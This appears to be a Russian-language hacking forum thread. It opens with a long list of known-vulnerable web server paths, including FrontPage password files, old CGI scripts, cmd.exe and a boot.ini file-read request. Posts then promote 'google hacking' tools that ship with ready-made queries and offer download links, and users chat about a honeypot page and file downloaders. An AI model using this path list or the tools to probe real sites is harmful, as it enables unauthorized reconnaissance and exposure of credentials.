/WebShop/templates/cc.txt
/_private
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin /fpcount.exe
/_vti_inf.html
/_vti_pvt
/_vti_pvt/administrators.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/service.pwd
/_vti_ pvt/shtml.dll
/_vti_pvt/shtml.exe
/_vti_pvt/users.pwd
/adsamples /config/site.csc
/bin
/carbo.dll
/ccbill/secure/ccbill.log
/cfdocs/cfmlsyntaxcheck.cfm
/---/docs/sourcewindow.cfm
/---/email/getfile.cfm?filename=c:\boot.ini
/---/displayopenedfile.cfm
/---/exprcalc.cfm
/---/openfile.cfm
/---/sendmail.cfm
/cfdocs/snippets/fileexists.cfm
/cfdocs/snippets/viewexample.cfm
/cgi
/cgi-bin
/cgi-bin/AT-admin.cgi
/cgi-bin/AT-generate.cgi
/cgi-bin/Admin_files/order.log
/cgi-bin/AnyForm2
/cgi-bin/Cgitest.exe
/cgi-bin/Count.cgi
/cgi-bin/FormHandler.cgi
/cgi-bin/GW5/GWWEB.EXE
/cgi-bin/UltraBoard.cgi
/cgi-bin /UltraBoard.pl
/cgi-bin/add_ftp.cgi
/cgi-bin/adp
/cgi-bin/adpassword.txt
/cgi-bin /ads.setup
/cgi-bin/aglimpse
/cgi-bin/alibaba.pl
/cgi-bin/allmanage.pl
/cgi-bin/allmanage/adp
/cgi-bin/allmanage/k
/cgi-bin/allmanage/settings.cfg
/cgi-bin/allmanage/userfile.dat
/cgi-bin/allmanageup.pl
/cgi-bin/anyboard.cgi
/cgi-bin/architext_query.pl
/cgi-bin/authorize/dbmfiles/users
/cgi-bin /ax-admin.cgi
/cgi-bin/ax.cgi
/cgi-bin/bigconf.cgi all
/cgi-bin/bizdb1-search.cgi
/cgi-bin/bnbform.cgi
/cgi-bin/cachemgr.cgi
/cgi-bin/calender.pl
/cgi-bin/calender_admin.pl
/cgi-bin/campas
/cgi-bin/cart.pl
/cgi-bin/cgiwrap
/cgi-bin /classifieds.cgi
/cgi-bin/clickresponder.pl
/cgi-bin/cmd.exe
/cgi-bin/counterfiglet
/cgi-bin/dbmlparser.exe
/cgi-bin/dig.cgi
/cgi-bin/dnewsweb
/cgi-bin/edit.pl
/cgi-bin/environ.cgi
/cgi-bin/excite
/cgi-bin/faxsurvey
/cgi-bin/filemail.pl
/cgi-bin /files.pl
/cgi-bin/finger
/cgi-bin/finger.pl
/cgi-bin/formmail.pl
/cgi-bin/fpcount.exe
/cgi-bin/fpexplore.exe
/cgi-bin/gH.cgi
/cgi-bin/get32.exe
/cgi-bin /glimpse
/cgi-bin/guestbook.cgi
/cgi-bin/handler
/cgi-bin/htimage.exe
/cgi-bin/htmlscript
/cgi-bin/htsearch
/cgi-bin /htsearch
/cgi-bin/iisadmpwd/achg.htr
/cgi-bin/iisadmpwd/aexp.htr
/cgi-bin /iisadmpwd/aexp2.htr
/cgi-bin/iisadmpwd/anot.htr
/cgi-bin/imagemap.exe
/cgi-bin/info2www
/cgi-bin/infosrch.cgi
/cgi-bin/input.bat
/cgi-bin/input2.bat
/cgi-bin/jj
/cgi-bin/k
/cgi-bin/loadpage.cgi
/cgi-bin /mailform.exe
/cgi-bin/maillist.pl
/cgi-bin/makechanges/easysteps/easysteps.pl
/cgi-bin/man.sh
/cgi-bin/netstat
/cgi-bin/nph-publish
/cgi-bin/nph-test-cgi
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/perl.exe
/cgi-bin /perlshop.cgi
/cgi-bin/pfdispaly.cgi
/cgi-bin/pfdisplay
/cgi-bin /pfdisplay.cgi
/cgi-bin/phf
/cgi-bin/php.cgi
/cgi-bin/plusmail
/cgi-bin /postcard.pl
/cgi-bin/printenv
/cgi-bin/process_bug.cgi
/cgi-bin/query
/cgi-bin/responder
/cgi-bin/rguest.exe
/cgi-bin/rpm_query
/cgi-bin/rwwwshell.pl
/cgi-bin /search.cgi
/cgi-bin/settings.cfg
/cgi-bin/sojourn
/cgi-bin/survey.cgi
/cgi-bin/test-cgi
/cgi-bin/test.bat
/cgi-bin /textcounter.pl
/cgi-bin/tpgnrock
/cgi-bin/tst.bat
/cgi-bin/tst.bat
/cgi-bin/unlg1.1
 
Google hacking tools
http://news.xss.pro/google_hacker.gif
2 замечательные тулзы: googler и google hacker 1.2 существенно облегчают процесс google хакинга.

1) Googler
Данная тулза ищет в гугле без открытия браузера. Генерирует список адресов (можно целиком, а можно только урл на индекс), который удалось проге выловить из гугла по введенным ключевым сломам.

2) Google hacker
Скриншот этой проги дан выше. Содержит ОГРОМНУЮ кучу готовых запросов в гугл. Выбираем, кликаем кнопочку и все.

Закачка далее....[New$paN]

:zns5: Скачать|Download Googler
:zns5: Скачать|Download Google hacker 1.2
 
мдя.... тупость человечества неистребима это каким же надо быть неумным чтоб такое сделать .... даже мне такое в голову приходило что так делать нельзя (я никогда не занмался созданием интернет сайтов =))) )
 
mause
Чего тебе не нравится? Что не так? Если ты собираешься критиковать движение гугл хакинг, то это не тупость а генеальное использование поисковика. Точнее выжимание из него все 100%
 
нет ты меня не понял я про тех кто допускает такое на своих сайтах ничего против я не имею и даже полностью за =)
 
http://gray-world.net/etc/passwd/

This is the honey pot ..or honey page.
Thanks to this paper author for the honey page idea.
Thanks to Google developers for the query string into the HTTP Referer field.
Learn more about google hacking at johnny.ihackstuff.com.

Alex / GW team / gray-world.net
Send your suggestions/comments to alex at gray-world.net
Page summary :

Online since : 14/08/2003
Total requests : 1
Google requests : 1 (100%)
Statistic : here


Вот такой вот гугл хак)
 
MirAge
Нет. Лучше купи премиум карженый и не парься.
Лучше скачай rapget и не парься. Она все качает и сама прямые линки получает
 
F1reF0x
это фейк для накрутки трафа
смотри также http://durito.narod.ru
внизу index-страницы тоже самое, я когда-то прикалывался
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх